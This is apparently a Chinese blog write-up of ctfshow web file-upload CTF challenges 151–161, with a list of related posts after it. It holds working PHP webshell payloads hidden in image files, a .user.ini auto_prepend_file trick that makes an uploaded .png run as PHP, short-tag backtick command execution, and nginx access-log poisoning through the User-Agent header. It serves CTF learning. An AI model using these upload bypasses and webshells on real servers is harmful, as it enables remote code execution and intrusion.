ctfshow web入门 文件上传(持续更新)

最新推荐文章于 2024-05-06 23:21:36 发布
最新推荐文章于 2024-05-06 23:21:36 发布
阅读量475 收藏
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/115197536
版权

文章目录

web151-152

hint是前台验证,那么直接先上传.png后缀的图片马,在burp中将.png改为.php即可,然后蚁剑连接拿到flag
在这里插入图片描述

web153

这题我试了把后缀改为.Php .php2 .phtml 估计是服务器不解析的原因,在访问时只能把他们下载下来,因为这里是nginx,所以试了上传.user.ini,发现可行

我们指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);

先上传一个.user.ini文件,

GIF89a
auto_prepend_file=1.png

再上传1.png

#define width 1337
#define height 1337
 
<?php @eval($_POST[a]);?>

然后访问url/upload/index.php,flag在上一级目录的flag.php中

web154-159

这题需要修改一句话木马,改成

#define width 1337
#define height 1337
 
<?=`tac ../f*`;?>

这里可以使用短标签,php会将``中的内容当作代码去执行。
在web157后,需要将最后的;删去

#define width 1337
#define height 1337
 
<?=`tac ../f*`?>

web160

我初步的测试了下,过滤了空格 | ( | [ | { | ` |,那么这题可以选择日志包含。
先上传.user.ini和图片,图片的内容是<?=include"/var/lo"."g/nginx/access.lo"."g"?>,然后在访问url时修改ua头为一句话木马即可
在这里插入图片描述

web161

在上一题的基础上,增加了对图片头的检测,在图片.user.ini前面加上GIF89a即可

Lum1n0us
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow web入门文件上传
Npceer-一位网安初学者的博客
05-25 398
之前已经写了一部分了 补一下博客 给自己之后当笔记看看 这里写目录标题0x01 web153(前面两题懒得写博客了)0x02 web 154 0x01 web153(前面两题懒得写博客了) 首先题目环境大多是nginx 前面两题是前端验证 直接抓包改后缀就行 这次不行了 所以说到nginx我们考虑到.uer.ini (.htaccess是apache下的) 但是被挡下来了 于是上传.user.ini.png 内容是 然后抓包把后缀.png去掉 就可以 这个第一行是gif的文件头 之前写其他平台文件上传的时
ctfshow web入门 151-170文件上传wp
Firebasky的博客
11-12 1032
hhh 还是懒 链接:https://pan.baidu.com/s/1jAxmXznCWTm0UdXPc8VvCg 提取码:m9bw 复制这段内容后打开百度网盘手机App,操作更方便哦
ctfshow-web入门-文件上传
最新发布
yingu9267的博客
05-06 197
访问url/upload即可(upload自动调用index.php,index.php又自动调用1.png中的system代码(.user.ini设置的结果))上传包含恶意代码的1.png(png图片里有php后门代码,但是图片格式不能被触发,所以连接不上后门,要通过.user.ini才能以php形式运行)过滤了“[]”,使用
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1080
CTFshow-文件上传
CTFshow-WEB入门-文件上传(持续更新)
feng的博客
01-20 2047
web151 前端检测,抓包改后缀。 web152 直接传 web153 php2, php3, php4, php5, phps, pht, phtm, phtml 经过测试全都不行。因此环境是nginx不是apache,所以.htaccess也不行。访问一下/upload/目录,发现页面存在,经过测试,/upload/index.php存在,因此想到上传.user.ini web154 经过测试,文件里不能有php,而且对后缀进行了过滤,同样利用.user.ini,文件内容的过滤则利用PHP的短标签
CTFSHOW 文件上传
qq_51754713的博客
02-27 361
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
[CTFSHOW]文件上传
Huamang的博客
03-28 261
web 151 看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码 web 152 和上题一样的解法 web 153 和上面一样的解法直接改后缀就没用了 测试了一下,发现是黑名单的过滤 所以就上传.htaccess文件把png文件解析成php 但是很遗憾,用不了 引用一波羽大佬的wp: 本题考点为.user.ini,详细配置可以参考官方文档 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和
2024年最全CTFshow web入门——文件上传_ctfshow文件上传,给大家安排上
2401_84520377的博客
05-05 994
上传一个图片木马,发现上传不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上传,bp抓包。
ctfshow-web154(文件上传)
m0_62094846的博客
01-18 793
png上传也会错误,说文件内容不合规 上传个不带木马的文件就可以 说明一句话木马中有敏感信息 使用其他短标签可以绕过 <?= eval($_POST[1]);?> <? eval($_POST[1]);?> <% eval($_POST[1]);%> 传入png的木马文件可以,但是php文件加了png文件头也没用 说明可能php确实就是不能使用 考虑使用配置文件 .user.ini 确认是否可以使用 确实可以,接下来就比较好办了 ...
CTFshow 文件上传 web154
Kradress的博客
02-15 419
目录思路总结 思路 上传一个包含shell的png文件,发现上传失败 清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过 shell.png <?phP echo 123;pHpinfo();eval($_POST['cmd']); ?> 发现其他和上题一样,直接上传.user.ini .user.ini auto_prepend_file=shell.png 然后访问/upload/index.php,直接RCE 总结 …
WEB入门文件上传
非鱼的博客
11-15 89
链接:https://pan.baidu.com/s/1YGj8gl-7mpRTE5TlFbK4BQ 提取码:feiy 复制这段内容后打开百度网盘手机App,操作更方便哦
man-study-03 用maven搭建一个数据库实验项目-后台实例
fhzheng for c java javascript sql html css
03-07 264
创建一个maven项目,这里只有后台部分,前台页面部分,需要实践时再补充。 可以从servlet处入手,添加urlPattern后,然后和页面对接起来用。 项目结构如下: 测试数据库如下: /* Navicat MySQL Data Transfer Source Server : MySQL57 Source Server Version : 50718 Source Hos...
ctfshow-web153(文件上传)
m0_62094846的博客
01-17 1901
.user.ini 原理: 指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件,巧合的是这题upload目录下有个index.php所以这种方式是可以成功的。 注:auto_append_
ctfshow文件上传
weixin_53955759的博客
04-15 761
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
ctfshow web入门文件上传
09-29
文件上传是CTF比赛中的一个常见挑战之一。其中一种方法是通过上传包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上传图片时,可以同时上传一个名为.user.ini的文件,并在其中设置auto_append_file参数来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值